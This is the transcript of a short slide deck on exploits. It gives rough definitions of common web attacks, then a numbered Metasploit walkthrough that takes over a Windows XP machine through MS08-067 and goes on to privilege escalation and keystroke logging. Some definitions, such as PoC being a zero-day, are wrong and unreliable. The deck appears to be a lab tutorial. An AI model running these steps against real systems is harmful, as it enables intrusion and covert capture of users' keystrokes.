introduction of exploit on window xp & trick
Post on 09-Jun-2015
642 Views
Preview:
DESCRIPTION
TRANSCRIPT
Latest Technologies (Exploit Tricks)
Uploaded byIndu Rajawat & Megha Kahndelwal latest.com.co (Imperial Soft Tech)
CONTENTS
1.Introduction2.Types3.Exploit Design Goals4.Exploit Mixins5.MS08_067_netapi Vulnerability (an example of exploit mixins)
latest.com.co (Imperial Soft Tech)
INTRODUCTION
An exploit is a piece of software of chunk of data that takes advantage of velnerability or bug in order to cause unintended or unanticipated behavior to occur on computer.
latest.com.co (Imperial Soft Tech)
TYPES1.Xss(Cross site scripting)
2.Sql injection
3.Clickjacking
4.DDos attack
5.POC attack (Proof of conect)
6.Spoofing
Xss
Cross-site scripting is a security loophole on a website that is hard to detect and stop, making the site vulnerable to attacks from malicious hackers.
latest.com.co (Imperial Soft Tech)
Sql injection
SQL Injection involves entering SQL code into web forms, eg. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application.
latest.com.co (Imperial Soft Tech)
Clickjacking
clickjacking attacks a fundamental design of HTML itself. It's pulled off by hiding the target URL within a specially designed iframe that's concealed by a decoy page that contains submission buttons.
latest.com.co (Imperial Soft Tech)
DDos attack
A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.this is not actually hacking a webite but it is used to take down a website.
If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack,this one of the most used method for website hacking
latest.com.co (Imperial Soft Tech)
PoC attack
In computer security the term proof of concept (proof of concept code or PoC) is often used as a synonym for a zero-day exploit which, mainly for its early creation, does not take full advantage over some vulnerability.
latest.com.co (Imperial Soft Tech)
Spoofing
a spoofing attack is a situation in which one person or program successfully masquerades as another by falsifying data and thereby gaining an illegitimate advantage.
Design Goals
1.Design goals should be minimalist.2.Proof of concepts should be written as Auxiliary DoS modules, not as exploits. 3.The final exploit reliability must be high. 4.Target lists should be inclusive. 5.exploits should be readable as well.
latest.com.co (Imperial Soft Tech)
Exploit Mixins
1.Exploit::Remote::Tcp
2.Exploit::Remote::DCERPC
3.Exploit::Remote::SMB
4.Exploit::Remote::BruteTargets
latest.com.co (Imperial Soft Tech)
MS08_067_netapi Vulnerability
This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system remotely. On Microsoft Windows 2000-based, Windows XP-based, and Windows Server 2003-based systems, an attacker could exploit this vulnerability over RPC without authentication and could run arbitrary code.
latest.com.co (Imperial Soft Tech)
Steps:1).msfconsole2).search exploits3).use exploits/windows/smb/ms08_067_netapi4).show options5).set lhost 6).set rhost7). exploit8).now go to window xp in command window and type netstat -ms
Command prompt
Steps 9). ps10). migrate (PID) 11). screenshot12). shell13). cd documents & settings14). cd admin15). cd desktop16). md folder17). exit
Screen-shot
latest.com.co (Imperial Soft Tech)
New folder
latest.com.co (Imperial Soft Tech)
Steps18). help19). getsystem20). keyscan_start21). now go to window xp n open notepad n write something22). keyscan_dump23). keyscan_stop
latest.com.co (Imperial Soft Tech)
Thank u
latest.com.co (Imperial Soft Tech)
softtechimperial@gmail.com
Contact Us on
latest.com.co (Imperial Soft Tech))
top related